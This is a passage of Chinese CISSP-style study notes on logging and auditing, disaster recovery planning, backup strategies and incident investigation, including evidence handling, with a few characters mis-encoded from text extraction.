变更日志:记录变更请求、批准和系统的实际变更。作为DRP(灾难恢复计 划)的一部分,变更日志很有用,灾难恢复时使用变更日志,有助于将系统还原。 64、日志功能通常都是操作系统的自带功能,可以让绝大多数应用系统 和服务使用。对于特权账户的活动(event),一定要记录。 65、保护日志文件免受未授权的访问和修改很重要(否则证据就没 了!)。可以在中央系统上存储日志的副本,对日志文件的备份也很重 要,可以保存一年、三年、甚至可以无限期保存。不需要时,应及时销 毁。如果法规要求保存一年,就绝不要保存十年,否则浪费时间和精力。 66、“监控”使得员工能积极遵守安全策略,意识到日志能够记录活动 的用户,不太会尝试绕过安全控制。所以说,审计跟踪是一种威慑手段。 67、审计踪迹(Audit Trails),主要是日志中的记录,通过查看这个,安 全专业人员重建导致事件的条件和系统状态。 68、日志的时间戳很重要,网络时间协议NTP服务器就很重要,系统应该 和NTP同步。 69、一些日志文件可以捕获应用程序崩溃时的内容,比如转储文件 (crash dump file)可以帮助诊断问题。 70、日志分析应该是周期性的任务(而不是出了事才看),可以检测潜 在的问题,可以手动看,也可以用自动化工具来分析。 71、有很多应用程序可以监控网络上的系统,比如SIEM、SEM、SIM,指 的是安全信息和事件管理。这些工具为组织ᨀ供了系统事件的实时分析。 监控网络流量,读取日志,也可能需要装很多代理。使用数据挖掘技术。 72、还有一些监控工具可以跟踪系统的版本信息、是否打了补丁、有无 安装未授权软件等等。类似青藤云安全。 73、统计学抽样(Statistical sampling)使用精确的数学函数从大量数据 中抽取有意义信息,允许审计人员快速地从审计跟踪中确定重要的问题; 统计学抽样是建立在科学的基础上的,可以通过抽样比较准确的反映真 实情况。虽然也有不真实的风险。 74、阀值级别(Clipping Levels),是一种非统计抽样(nonstatistical sampling),它只选择超过阀值平均值的事件,如果事件未达到此阀值, 系统就会忽略该事件。比如阀值设为30分钟内有5次或5次以上失败登录 时才发布警报。其实这可理解为一种超出基线就处罚异常的报警。注意: 非统计抽样是任意抽样,审计程序有自由裁定权(discretion)。这种方 法不能ᨀ供整体数据的精确代表值,可能会忽略未达到阀值的事件。然 而这更便宜、更容易实现。 75、由于日志太大了,可以用抽样的方法。统计抽样则是在统计了的情 况下再进行的抽样调查,更可靠更精确。非统计抽样要依靠专家来判断 是否有问题。这两种方法都被认为是用来概括大量数据的有效方法。 76、其他监控:除了日志,CCTV也是一种监控工具。击键监控是监控用 户在物理键盘上进行击键的行为。视频录屏可以执行可视化监控。只有 在极端环境下,击键监控才能实际作为一种审计和分析用户活动的方法。 77、其他监控:许多击键监控的组织都通过雇佣协议、安全策略和登录 警告标题来通知经过授权或未经授权的用户存在这样的监控措施。 78、其他监控:流量分析和趋势分析也都是监控的形式,他们对数据包 的流(而不是内容)进行检查,也被称为网络流量监测。如果有一名员 工的账户发送大量的电子邮件给别人,就可能表明该员工的系统中木马 了。 79、出口监控(Egress monitoring),监控出战的流量,防止数据泄漏。 DLP就是干这个的,主要有两种,基于网络的和基于终端的。 基于网络的DLP:对不加密的流量有深层次检测能力(rar),但对于加 密的,就没有办法了,APT攻击都会加密后再传输的。 基于终端的DLP:可以防止用户把敏感数据复制到USB闪存中。也可以 阻止对某些含关键字的文档的拷贝和打印,可以做的很多,比如终端安 全平台、保密监管平台。 80、隐写术(steganography)在文件中嵌入信息,如果有一个可疑文件 的源文件,就可以检测隐写术。组织可以定期检测很少变化哈希值的内 部文件,如果发现内部员工发出文件的哈希值和原始文件的不一样,就 说明可能含有隐藏信息。 81、水印(watermarking),数字水印是一种在数字文件中秘密嵌入的标 记。比如电影数字拷贝每个副本都有一个不同的标记,可以追踪是谁盗 版了电影。DLP能检测到水印,如果从水印中识别到敏感信息,就会阻止 并向安全人员发出警报。 82、审计是一种针对环境的有条理的审查方式。审计人员负责测试和验 证安全策略或法规的具体落实和相关的过程、程序,通过检查使它们满 足组织的要求,并且还验证工作人员是否遵循这些过程。审计有两重含 义,一个是审计日志和使用监控工具跟踪活动,一个是检查或评估 (Inspection or Evaluation)。 83、明确并坚持审计频率是很重要的,通常按照风险的大小来决定审计 的频率(审计是需要时间和成本的,所以对特权账号的审计频率会高一 些)。 84、不执行审计,就是管理层没有Due Care;审计可以由内部人员做, 也可以由外部做。 85、有关访问控制的审计有两大类,一种是访问审查审计(Access review audit),一种是用户权限审计(user entitlement audit)。 访问审查审计:检查访问和账户管理是否符合安全策略,比如检查一 个有较高权限的用户确实是由于工作需要,检查数据是否已经分类,用 户是否知晓分类,用户是否知道自己为什么有高权限,检查用户确保他 们没有过多的权限(clearance)。 用户权限审计:检查用户是否被授予过多的特权(具体的操作特 权)。 86、要对高级别管理组进行审计(High-level administrator group),看是 不是有不该在里面的人,可以通过自动化工具监视特权的执行(比如添 加用户),可以通过检查审计踪迹来查看是谁干的。要查看在删除一个 高权限用户这方面,有没有制定流程。 87、许多组织要求管理员拥有两个账户(Dual administrator accounts), 一个作为日常使用,一个拥有特权。因为如果有恶意软件感染,用户登 录特权后,恶意软件就可以使用该账户的特权,如果管理员只用工作时 间的十分之一使用特权账户,那么被恶意软件感染的机会就会少。审计 员也可以验证管理员是否适当地使用特权账户,因为按道理他应该用十 分之一的时间登录特权账户,这很容易查�闯隼础� 88、注意:管理员账户的密码要更长,一般人的口令要8个字符,那管理 员的最少要为15个字符。 89、安全审计至少要看这几个方面:补丁管理、漏洞管理、配置管理、 变更管理。 90、审计报告要包含:审计目的、审计范围、发现问题、具体细节(问 题、事件、条件)、标准和基线、原因、影响、建议的解决方案。 91、审计报告通常包含敏感信息,所以要有一个分类标签,可以访问这 个报告的人:高层管理人员、创建报告的人、负责更正的人。 可以修 改为只给相关的人看相关的内容,高级管理人员可以只看简洁的概述或 总结。 92、审计报告完成后,要按照安全策略,将报告ᨀ交给指定的接收人, 并且经常需要接收人签字。如果其中含有严重安全违规问题或履职问题 时,员工需要将其升级到更高层次的领导。 93、当问题严重到不能等到最终报告一起汇报的时候,审计师可以发临 时报告。 94、审计师一旦完成审计调查,通常会召开退出会议(exit conference )。 在退出会议上陈述发现的问题并讨论,以寻找解决方法。会议结束后离 开房间后才会向组织ᨀ交最终的审计报告,以保障审计报告是不受干扰 和胁迫的。 95、组织收到最终报告后,内部审计人员对其进行审查,并据此向高级 管理层ᨀ出建议,高级管理层负责选择哪些建议可以采纳,最终由内部 人员实施。 第18章 灾难恢复计划 1、灾难恢复计划DRP从BCP中止时开始,当灾难发生时,业务连续性计 划无法防止业务中断时,灾难发生,灾难恢复计划开始生效。 2、停止、阻止或中断组织执行工作任务的任何事件都被视为灾难。 3、每天在美国,至少有1000幢建筑物发生火灾。 4、全世界的BCP/DRP团队能够从纽约大停电(纽约以及美国东北部和 中西部遭遇了大停电)中得到如下教训: 1、确保作为替代的站点与主站点有足够远而不至于收到相同的灾难。 2、灾难往往不会伴随着预先告警。 5、一种人为的灾难形式,可能是罢工或劳工危机。如果大部分员工在同 一时间罢工,怎么办。要能够解决这个问题。 6、小偷可能偷空调、管道、电源子系统、铜,这种威胁也很讨厌。 7、理解系统恢复和容错能力: 单点故障(Single poiint fault)是指能让整个系统崩溃的组件(单磁 盘、单数据库)。 容错能力(Fault tolerance)是指系统在发生故障的情况下仍然继续运 行的能力(RAID)。 系统恢复能力(system resilience)是指系统发生不利事件时保持可接 受服务水平的能力。 发生故障后,容错能力能够使故障转移到其他服务器上,而系统恢复 能力能够在系统修复后,重新返回原服务器。 8、 RAID-0:也称条带。使用两个或两个以上的磁盘,ᨀ高性能,不ᨀ供 容错能力。RAID 0ᨀ高存储性能的原理是把连续的数据分散到多个磁盘 上存取,每个磁盘执行属于它自己的那部分数据请求。这种数据上的并 行操作可以充分利用总线的带宽,ᨀ高磁盘整体存取性能。 RAID-1:也称镜像,使用两个磁盘。 RAID-5:奇偶校验,也叫具有奇偶校验的磁盘条带化(disk striping with parity)。使用三个或更多磁盘,相当于一个磁盘,其中包好奇偶检 验信息,最多允许一磁盘损坏,此时也将继续运行,但速度会变慢。 RAID-10:也被称为RAID 1+0 或条带镜像,在RAID-0的基础上再配置两个 或两个以上的镜像(RAID-1)。使用至少4个磁盘,磁盘添加数为偶数。 9、容错和备份不同,即便有容错,也要做备份。因为灾难性的硬件故障, 可能会破坏一个磁盘阵列。 10、RAID可基于软件、也可基于硬件。大多数基于硬件的阵列支持热交 换,在不断电的情况下更换损坏的硬盘。 11、对于数据库而言,DB1和DB2是配置在故障转移集群(fail over cluster) 中的两台数据库服务器,如果DB2检测到DB1损坏,集群将会自动切换 (fail over)到DB2。 12、使用UPS的目的是为了完成系统的逻辑性关闭ᨀ供足够的时间。并且 ᨀ供电涌(surge)保护。 13、spike是激增,sag是下滑,surge是长时间维持高压(电涌), brownout是长时间处于低压。噪音称为瞬变Transient。 14、只要发电机有燃料,就能依靠发电机获得稳定电力。 15、可信恢复(Trusted Recovery)保证系统在发生故障后,系统仍然至 少和以前一样安全。系统恢复可以是自动的也可以是手动的。系统应该 被设计为fail-secure或fail-open状态,选择取决于系统故障后安全性重要 还是可用性重要。(考虑防火墙、电子锁故障时的两种不同模式)。 16、服务质量(QoS),主要考虑因素:带宽、延迟、抖动(Jitter,不 同包的延迟不一样)、丢包、干扰(引发错数据)。 17、当灾难发生时,灾难恢复计划应该几乎能够几乎全自动起到作用并 开始为恢复操作ᨀ供支持。即使正式的DRP团队还未到场,灾难现场的第 一位员工能够以有组织的方式立刻开始恢复工作。 18、购买保险也能够减少经济损失,一定要购买足够责任范围的保险, 以便能够从灾难中恢复过来。简单的定额责任范围可能不足以包括实际 的更换成本。 19、有价凭证保险(Valuable paper insurance)责任范围为记名的 (inscribed)、打印的和书面的文档与手稿,以及其他打印的业务记录ᨀ 供了保护。不过,这种保险的责任范围并不包括对钞票和印刷的安全证 书的损坏。 20、恢复策略(recovery strategy)中的几个内容:确定业务单元的优先 顺序、危机管理、应急联络、工作组恢复、可替代的工作站点、相互援 助协议、数据库恢复。 21、确定业务单元的优先顺序:为了尽可能最有效地恢复业务运营,优 先级别最高的业务单元要能被最先恢复。DRP团队必须识别和优化重要业 务功能,定义想恢复哪个功能或以什么顺序恢复。优先级评定这个工作 在BCP里面已经做过BIA(业务影响评估)工作,所以BIA可以作为以评定 优先级任务的基础。这个任务的结果是一张简单的业务单元优先级列表。 22、在试图开始完全恢复工作之前,在组织内最好先恢复最高优先级业 务单元 50%的运营能力(因为并不是这个业务单元里的所有任务都是最 高的优先级别),然后继续恢复优先级别较低的业务单元,使之达到最 小限度的运营能力。 23、危机管理:对于公司中很可能首先注意到发生了紧急情况的个人 (也就是保安、技术人员等)应该对他们进行完整的灾难恢复措施培训, 并且让他们知道适当的通知措施和立即响应机制。惊恐的员工想到的只 是迅速逃离。要进行连续的灾难恢复培训。比如培训所有的员工在发现 火灾时,启动防火警报装置或与应急办公室联系。 24、应急联络:当灾难来袭时,组织能够在内部与外部之间进行通信是 很重要的。如果组织无法与外部保持联系,公众很容易感到害怕并往最 坏处想。灾难期间,组织内部进行沟通也是很重要的,这样员工就知道 他们应该做些什么,例如:是回去工作,还是向另一个地点汇报情况? 灾难可能毁了通信系统,要事先想好怎么做。 25、工作组恢复(workgroup recovery):在设计DRP时,记住最重要目 标是让工作组恢复到正常状态并最终使他们可以在日常办公地点工作。 很容易把工作组恢复变为次要目标,并认为灾难恢复纯粹是 IT 人员的工 作。比如可以先把工作组安排在临时的办公场所,等条件具备时再搬回 来。 26、可替代的工作站点:DRP最重要的要素之一是:在主要的工作站点无 法使用时选择可以替代的工作站点。几类站点:冷站点、温站点、热站 点、移动站点、服务局以及多站点。 27、选择任何可替代的工作站点时,一定要确认该场所远离主站点,从 而使其不会与主站点一起受到相同灾难的影响。但是也要近一些,至少 在一天内能开车到达那里。 冷战点(cold):可以是大的仓库、空的办公楼,没有计算机,没有 网。可能会有一些待用的电信链接(需要时就启用)。整体启动冷战点 需要数个星期。 温站点(warm):包含计算机和网络,但一般不含数据,需要使用时 要恢复数据。激活温站点需要至少12个小时。而热站点只要几秒或几分 钟。可以选择外包商ᨀ供的共享的温站点。 热站点(hot):有计算机和网络,主站点上的数据会被定期的复制到 热站点上。(如果数据还不是完全复制的,那么可以手动强制复制、也 可以把备份磁带搬到热站点,实在不行,只能丢失部分数据了)。 要确认热站点和主站点ᨀ供了相同级别的技术和物理安全控制。可以 选择外包商ᨀ供的共享的热站点。冷战点、温站点都可以外包。 移动站点(mobile):由设备齐全的拖车或其他容易重新装置的单元组 成。可以找专门的供应商联系ᨀ供服务。移动站点一般被配置为冷战点 或者温站点。一般不配为热站点。 服务局(service bureaus):服务局可以租借计算机时间,你可以在那 里或者远程的使用他们的服务器、工作站甚至是桌面,但出现灾难时, 要注意到可能存在资源竞争(服务局可能超卖了)。 云计算:公司可以保留自己的数据中心,但同时用IaaS服务作为备份。 这是经济实惠的。 28、备件库:一个选项是利用“内部”(in house)替换,备件存放在不 同但是很近的位置(比如城里另一端的某个仓库)。如果出现硬件故障, 可以立即取出。另一个选项是与供应商的 SLA 类型约定,从而在发生灾 难时能够ᨀ供快速的响应和交付。然而,即使与供应商签署了 4、12、 24 或 48 小时的替换硬件合同,他们也不一定是靠谱的,不要仅仅依赖 他们。 29、相互援助协议(Mutual AssistanceAgreement, MAA)也被称为互惠协 议,在灾难恢复的文学作品中非常流行,但是在真实世界的实践中很少 被实施。在 MAA 下,两个组织保证在灾难发生时通过共享计算设施或 其他技术资源彼此相互援助。缺点:MAA 很难强制实施。协议参与各方 要彼此信任,当真的出现灾难时,非受害方可能会拒绝履行协议。受害 方只能通过法律手段取得赔偿;相互合作的组织的地理位置应该相对接 近,以便于不同场所之间员工的交通便利。但是,地理位置靠近意味着 两个组织很可能遭受相同的威胁;出于对机密性的考虑,经常会阻止公 司将自己的数据放置在其他公司手里。除去这些需要关心的问题,对于 组织来说,MAA 可能是一种很好的灾难恢复解决方案。 30、数据库恢复:电子链接、远程日志处理、远程镜像三种方法。 电子链接,电子传送:Electronic Vaulting,数据库备份通过大数据量 (Bulk)传送的方式被传送到某个场所。AIO:电子传送在文件发生改变 时进行备份,传输并不实时进行,而是批量传送备份。公司可以选择每 小时、每天、每周或每月将发生改变的所有文件都传送到备份设施。注 意从灾难宣布到数据库准备好,这是会有时间延迟的,和供应商签合同 时,注意要考察服务的书面定义,包括存储容量、线路带宽,恢复数据 库的时间等等。要定期测试。电子传送可以使用在热站点上也可以仅仅 是备份数据的场所。 远程日志(Remote jouraling):数据仍然批量传输,但更频繁,每小 时一次或者更短。传输数据库事务日志的副本到备份服务器上。包括从 上次批量传输以来发生的事务。 远程镜像(Remote Mirroring):最先进、最好,很贵,应该是TC这样的 解决方案。热站点常用。 31、恢复计划开发(recovery plan development),建立业务单元优先级 和合适的恢复场所的办法后,就该起草实际的灾难恢复计划了。维护几 种针对不同读者的文档是一个不错的主意: 管理层(包括公关人员)看的概览式文件; 适用于某个部门的计划; 针对IT技术人员的技术性指南; DR团队人员要使用的检查清单(checklist); 为DR最关键成员准备的全套副本。 32、紧急响应(Emergency response),DRP中包含紧急响应,也即重要 人员在识别出灾难或灾难即将来临时应立即遵守的、简单但内容全面的 指令。根据灾难的性质、对事件做出响应的人员种类,以及在需要撤离 设施和/或关闭设备之前可用的时间,这些指令千差万别。例如,对于大 规模火灾的指令,就比预计48 小时后着陆的飓风袭击的指令更加简明。 记住一条重要的设计原则:对清单的任务进行优先级安排,最重要的任 务应当放在第一位!级别越低的条目,在撤离之前未被完成的可能性就 越大。 33、人员通知:DRP中应该还有一份人员列表以便联系。通常都是DRP团 队重要成员和整个组织内执行关键灾难恢复任务的人员。每一个角色还 有一个后备联系人,以防主要联系人联系不上。 34、许多公司用“电话树”的形式组织他们的通知清单,即树上的每一 个成员联系他下面的人,这样就把通知任务分散到团队的成员之中,而 不是只靠一个人拨打许多电话。注意一定要添加安全网。让每个链中的 最后一个人联系第一个人,以确定整个链条上的人都被通知到位。 35、 当灾难恢复团队到达现场时,他们的首要任务之-就是评估现状。 这通常以旋转的方式进行:第一响应者进行非常简单的评估、分类活动 并启动灾难响应。随着事件的发展,更加详细的评估将用于衡量灾难恢 复工作的有效性以及资源分配的优先级。 36、DRP(尤其是技术指南)应该完整地说明组织的备份策略。实际上, 这是任何业务连续性计划和灾难恢复计划中最重要的要素之一。有三种 备份: 完整备份:一旦完整备份完成,the archive bit on every file is reset, turned off, or set to 0. 增量备份(Incremental):只备份最近一次完整备份或增量备份以来 被修改过的文件。只复制哪些Archive bit turned on, enabled, or set to 1的 文档。一旦增量备份完成,归档比特重置。 差异备份(differential):备份哪些自从最近完整备份以来被修改过的 文件,只复制哪些Archive bit turned on, enabled, or set to 1的文档。和增 量备份的区别是,差异备份不改变归档比特。 增量备份和差异备份之间最重要的差异在于:如果组合使用完整备份 和差异备份,那么只需要还原两个备份,也就是最近的完整备份和最近 的差异备份; 如果组合使用完整备份和增量备份,那么就需要还原最近的完整备份 以及之后的所有增量备份。 要根据创建备份所要求的时间做出权衡:差异备份的还原时间短,但 是生成时间比增量备份长。 37、备份介质的保存,一份在主中心或附近,另一份要在离站offsite的位 置。 38、大多数组织采用一种以上的备份策略,并有介质循环使用计划。39、 比较常用的一种备份策略是:每个周末进行一次完整备份,每天晚上进 行增量备份或差异备份。具体的备份方式和备份流程取决于组织的容错 要求。 39、对于已知的计算灾难而言,备份可能是最少实践和最容易忽视的预 防措施。 40、磁盘存储变得越来越便宜。磁带和光盘已无法应付数据量的要求。 现在很多企业将磁盘到磁盘(D2D)备份方式应用于灾难恢复策略。基 于云的备份解决方案更具成本效益。 41、备份显著影响网络的性能,所以应该被调度在空闲时间如晚上进行。 42、请记住测试组织的恢复流程。企业往往出现的事实就是备份软件报 告备份成功而恢复尝试却失败,然而检测到有问题时已经太晚了。这是 备份失败的最大原因之一。 43、磁带轮换(Tape Rotation):几种磁带轮换策略包括: 祖父-父亲-儿子(Grandfather-Father-Son, GFS)策略、 汉诺塔策略 六磁带每周备份(每周六盒,Six Cartridge Weekly)策略。 这些策略相当复杂,尤其在使用很大的磁带组时更是如此。可以通过 使用一支铅笔和一本日历来人工实现这些策略,也可以通过使用商用备 份软件或全自动分层存储管理(Hierarchical Storage Management, HSM, 注意不要和硬件安全模块HSM弄混淆了)系统来自动实现这些策略。 HSM 系统是自动化的机械备份换带机,由 32 或 64 个光学或磁带备份设 备组成。 44、软件托管协议(Software Escrow arrangement):避免公司因为软件 开发商由于种种原因(比如破产)不能为产品ᨀ供支持的情况,从而将 其作为灾难恢复计划的一部分。 45、在软件托管协议下,软件开发商将应用程序源代码的副本ᨀ供给独 立的第三方组织。然后,第三方用安全的方式维护源代码副本备份的更 新。用户和开发商之间的协议具体说明了什么是“触发事件”,如开发 商满足服务级别协议(SLA)条款失败或开发商公司破产。 46、当触发器事件发生时,第三方会向用户释放应用程序源代码的副本。 用户可以通过分析源代码来解决应用程序的问题或实现软件的升级。 46、灾难恢复计划中必须包括数量充足的与外部联络的渠道,以便满足 公司的运营需求。通常,在灾难期间由 CEO 不适宜作为发言人。应当雇 用和培训媒体联络人员来做此事。 47、恢复和还原(Recovery and Restoration),恢复的是业务(大致能开 展工作即可),这个时间很短,DR团队必须在MTD/RTO时间内恢复。 而同时,抢救(salvage)团队要还原的是全部能力,必要时是还原至原 始位置。MTD(Maximum Tolerable Downtime) 48、只有全部正常操作都返回至被还原的原有场所后,才能宣告紧急状 态结束。DRP应当指定确定何时返回原有场所的标准,并指导DR团队和 抢救团队的有序交接。 49、培训、意识与文档。培训会根据公司中的职位和角色的不同而不同。 可以考虑下面的培训: 对全体新员工进行定向(Orientation)培训。 对第一次担任新的灾难恢复角色的员工进行基本培训。 对灾难恢复团队的成员进行详细的复习性培训。 对其他所有员工进行简要的意识ᨀ醒式培训(可以作为会议的一部分 完成培训或通过像电子邮件的时事通讯这样的介质发送给所有员工)。 50、灾难恢复计划还应该进行完整的文档记录。一定要实现必要的文档 记录过程,并在计划发生改变后修改文档。 51、DRP 应当被视为极其敏感的文档,并且只在有分类和“需知”的基 础上ᨀ供给个人。参与计划的人员应当完全理解其角色,但是不必知道 或访问完整的计划。当然,确保 DRP 团队关键成员和高级管理人员知晓 整个计划和理解高级?实现细节。完全不必让每位参与计划的人员都了 解所有的内容。 52、确保在主要场所和替代场所都有足够数量的打印副本,并且是最新 的。 53、每一种灾难恢复计划都必须定期测试。5种主要的测试类型:通读测 试、结构化演练、模拟测试、并行测试、完全中断测试。 通读测试(Read-through Test):最简单也最重要,让DR团队成员通读和审查 DRP,这还可以让他们定期复习自己的职责和知识,可以审查过时的信息,可以 识别已经走了的人。OSGT:Checklist review 结构化演练(Structured Walk-through):也即桌面推演,在一个大会议室里, 不同的人扮演不同的角色。 模拟测试(Simulation Test):与结构化演练类似。但其中某些响应措施随后 会被测试。可能涉及中断某些业务,并要求某些人员做操作。 并行测试(Parallel Test):parallel test,涉及将实际人员部署到恢复场所并启 用措施。以灾难实际发生时的方式执行他们的灾难恢复职责。唯一的差别在于主 要设施的运营不会被中断。 完全中断测试(Full-interruption Test):关闭主场所,将业务转移到恢复场 所,这安排起来极其困难,而且管理层也不太愿意。 54、DRP文档的维护:微小的变化经常会通过一系列的电话交谈或电子邮 件而进行,然而重大的变化可能需要整个灾难恢复团队进行一次或几次 会议商讨。 55、要应用正式的变更管理,在IT 基础设施发生更改时能够更新和检查 所有DRP文档。 56、通过常规的演练来确保 DRP 的所有元素都被正确地使用,确保所有 职员经过培训,确保新员工尽快了解相应的工作。 第19章 事件(Incidents)和道德规范 1、所有信息安全专家迟早都会遇到需要调查的安全事件(incident )。 2、操作型调查的首要目标是解决业务问题,比如web服务器发现性能问 题,要识别出现问题的根本原因,找出修复措施,防止类似事件再次发 生。 3、刑事犯罪调查通常由法律执行者进行,是针对违法行为进行的调查。 调查的结果是指控犯罪和控诉,案件必须满足超越理性怀疑(beyond a reasonable doubt,BRD)的证据标准,必须遵循严格的证据收集和保存 过程。(BRD是指排除合理怀疑,这里的怀疑是说怀疑疑犯并没有罪。 毋庸置疑) 4、民事调查(Civil investigation)通常不涉及执法,涉及内部员工和外部 顾问。他们会准备证据来解决双方之间的纠纷。民事调查并不遵循BRD 标准,只要能说明调查结果可以信赖就行,收集证据并不那么严格。 5、监管调查。在政府机构认为个人或企业违反法律时会执行,他们选取 地点,执行相适应的标准程序取证。 6、业务调查,又叫操作性调查,主要是为了解决业务问题,比如调查一 个一个WEB服务器不工作了,通常不涉及证据,主要是找到根本原因。 当然有可能过渡到另一种类型的调查。 6、电子发现(electronic discovery):在诉讼过程中,任何一方有责任保 留与案件相关的证据,并在控诉双方之间分享。这个发现过程应用纸质 档案,电子记录及相应的电子发现(eDiscovery)过程。包含9个步骤: 信息治理(信息被良好的组织)、识别(定位信息)、保存(确保不受 篡改)、收集(收集起来)、处理(粗剪)、检查(检查是否响应了请 求,去掉那些律师和客户之间保护的信息)、分析(深入分析内容和上 下文)、制作(按照响应的格式制作)、呈现(向当事方展现)。 Information Governance 、Identification、Preservation、Collection 、 Processing 、Review 、Analysis 、Production 、Presentation 7、证据:要成为可接纳的证据,必须满足3个要求。relevant,material, competent 1、证据必须是可以用来确定一个事实的。(relevant)客观性。 2、这个事实必须是和案件相关的。(material,that is,related)关联 性 3、证据必须要有法定资格。也即必须合法获得。非法搜查而得的证据 是不可接受的。(competent)合法性 8、法庭上可以用的证据类型:实物证据、文档证据、口供(证词、言词 证据)。实物包括带指纹的键盘、硬盘、DNA;文档包括计算机日志等。 9、文档证据适用两个规则:最佳证据规则、口头证据规则。 最佳证据(best evidence rule )指的是要ᨀ供原始文档,拷贝不算。 口头证据规则(parol evidence rule )指的是书面的协议也就是所有协 议,不认可其外的什么口头协议。 文档证据满足这两条,加上前面那三条,就会被法庭采纳。 10、为了确认这个物品就是涉案物品,必须建立证据链(chain of evidence,也被称为监管链(Chain of custody))。这涉及所有处理证据 的人,包括收集原始证据的警员、处理证据的证物技术人员以及在法庭 上使用证据的律师。对证据的位置必须从被收集的时刻到出现在法庭上 的时刻进行完整记录,以确保是同一证据。这需要对证据进行彻底标记, 每个人都要签署名字、记录谁在特定的时间接触过这个证据,以及要求 接触证据的原因。 11、言辞证据:证词既可以是法庭上的口头证词,也可以是记录存储的 书面证词。证人必须宣誓同意讲真话。证人必须记得证词的根据。证人 可以基于自己的直接观察来证明或驳斥某个断言的口头言辞。大多数证 人的言辞证据都被严格地限定为基于证人的事实观察的直接证据。不过, 如果法庭认为证人是特定领域的专家,那就不应采用这种方法。在这种 案件中,证人可以基于其他存在的事实及其个人的专业知识来ᨀ供专家 观点。 12、言辞证据不得是所谓的传闻(hearsay)证据。证人不可能证实其他 人在法庭外告诉他的内容。没有经过系统管理员验证的计算机日志文件 也可能被认为是传闻证据。 12、计算机证据国际组织(IOCE)概述了收集数字证据人员应该遵循的6 个原则: 遵循程序,包括通用的司法和程序原则; 不能修改证据; 有必要使用原始数字证据时,接受培训; 收集、访问、存储、转移证据相关的活动都应该完整的记录和保留; 应当对数字证据所做的所有行为负责; 任何机构在收集、访问、存储、转移证据时都要遵守上述原则。 13、在分析数字证据时,最好使用副本。例如,当对硬盘驱动器上的内 容进行调查时,制作驱动器镜像,并将原始驱动器密封在证据袋中,然 后使用镜像进行调查。 14、存储介质分析技术可能包括从物理磁盘的未分配扇区恢复已删除的 文件。 15、网络分析时,取证分析员(forensic analysts )的任务是收集不同来 源的信息,并将它们关联起来,然后完成一份尽可能全面的网络活动构 图。 16、软件分析时,取证分析员(forensic analysts )的任务是对软件代码 进行审查,以寻找后门、逻辑炸弹或其他安全漏洞。 17、硬件/嵌入式设备分析,取证分析员(forensic analysts )的任务是 对硬件和嵌入式设备的内容进行分析。 18、当启动计算机安全调查时,应该首先召集一支有能力的分析师团队, 明确调查范围、目标、权利、责任、守则。调查过程包括请求执法、实 施调查。 19、请求执法(Calling in law enforcement):在调查中必须做出的首要 决定是:是否要请求执法机构介入。这实际上是一个相当复杂的决定, 应当涉及资深管理官员。请外部专家有很多好处,因为外部专家确实很 牛逼的。但不利因素是:调查更公开化,可能给公司带来麻烦。而且执 法机构一定要采取遵从第四修正案和其他合法要求的调查方式,而如果 公司自我实施私下调解,则不需要这么做。 20、第四修正案:主要是关于搜查证(search warrant)的,“人们的人 身、房屋、文件和财产具有受保护而不被不合理地搜查和获取的权利, 在没有获得法律许可的情况下,这个权利不可剥夺。但是基于很可能的 原因,在誓言或确认的支持下,特定的场所会被搜查,人员或物品会被 逮捕或扣押。” 21、这个要求的例外规定有很多,如个人同意搜查、明确的犯罪证据或 威胁生命的紧急情况迫使进行搜查。基于可能动机的许可证发放,必须 有罪行已经发生的证据、搜查会进一步发现证据,才能这么做。搜查的 范围也应该很明确。如果不能遵守以上条款,证据就会无效,罪犯也可 能就“He got off on a technicality.” 22、实施调查:永远不要直接在已经被破坏的实际系统上实施调查。要 将系统脱机,进行备份,并且使用备份进行事件的调查;永远不要试图 “反黑”并对犯罪进行报复。否则,可能会无意中攻击无辜的第三方, 并且发现自己会受到计算机犯罪的指控;如果有疑问,那么就请求专家 的协助。如果不希望请求执法机构的协助,那么就联系一家在计算机安 全调查领域具有特殊经验的私人调查公司;调查初期对人最好不要像审 犯人那样,要采用非正规的口头会谈、约谈(Interview),当嫌疑犯被 确定时,才可以使用审问技术对他们进行盘问(Interrogation)。 23、约谈和审问是一种专门的技巧,并且应当只由训练有素的调查人员 进行。不恰当的方法可能会损害执法部门成功起诉嫌疑人的能力。此外, 许多法律都涉及对人员的限制或拘留。如果打算进行私下审问,那么就 必须严格地遵守这些法律。在进行任何约谈之前,要和律师商讨对策。 24、任何违反了一个或多个安全策略的个人都被认为是攻击者。获取军 方情报的攻击都是专业人员进行的,他们掩盖攻击痕迹也非常彻底。商 业攻击就是工业间谍活动;金融攻击/财务攻击( Financial attack)是 为了钱或者是免费打电话;恐怖攻击是为了控制电厂、控制电信或造成 电力中断;怀恨攻击(Grudge attack)通常来自于不满,经常就是现在 或以前的员工(尤其是最近被解雇的人),希望组织不能正常运作。 25、兴奋攻击(Thrill Attack)基本上就是脚本小子,缺少技能,容易导 致服务中断,可能会破坏数据,但主要动机是攻破一个系统,然后以此 为跳板,或者篡改别人的网页,以此炫技。 26、“黑客行动主义”常常将政治和黑客快感结合在一起,组织松散的 群体,叫个Anonymous之类的名字,用Low Orbit Ion Cannon这样的小工 具,制造大规模的拒绝服务攻击。 27、Event事件是任何发生的事(occurrence ),Incident算故障或事故, 是对CIA有负面影响的事件。事故没有被报告的最常见原因是他们从未被 发现。每天都有很多违反安全策略的事,事故也便随即而来。 28、如今,美国大多数州的法律都要求:如果组织的事故涉及特定的个 人标识信息(信用卡号、社会保险号和驾照号),那么就必须通知相关 人员。 29、扫᧿本身可能不一定违法,但这个证据应该收集下来,因为后续的 行为大约就是违法的了,防火墙记录这些被丢弃的包需要很多存储空间, 好在存储还比较便宜。 30、组建事故响应团队时,要有功能交叉的人,团队成员可能包括:高 层管理部门代表(办公厅)、信息安全专业人员、法律代表(法律局)、 公共联络的代表(政研室)、工程师代表(网络和系统)。 31、事故响应的三个过程: 1. 检测和确认Detection and identification 2. 响应和报告Response and reporting 3.恢复和补救Recovery and remediation 32、事故响应的第一个行动应该是致力于限制和阻止进一步的暴露和破 坏。注意:保持受害系统的运行状态,不要关机,关机会毁坏RAM中的 内容,从而破坏证据。 33、关于搜集证据:就内部调查而言,很容易通过自愿交出方式收集到 绝大多数证据。通常在某位高级管理人员的支持下,你会被授权得到调 查所需的组织内的任何资源。其次,可以让法院发出一张传票或法令, 强迫个人或组织交出证据,并由执法部门强制执行传唤。但这种做法也 会惊动某些人导致他更改证据。最后,可以选择申请搜查证。必须通过 合理可信的强烈怀疑使法官同意采取这样的行动。 34、还可以采取另一个步骤,以便确保恰当没收属于组织的设备的行为。 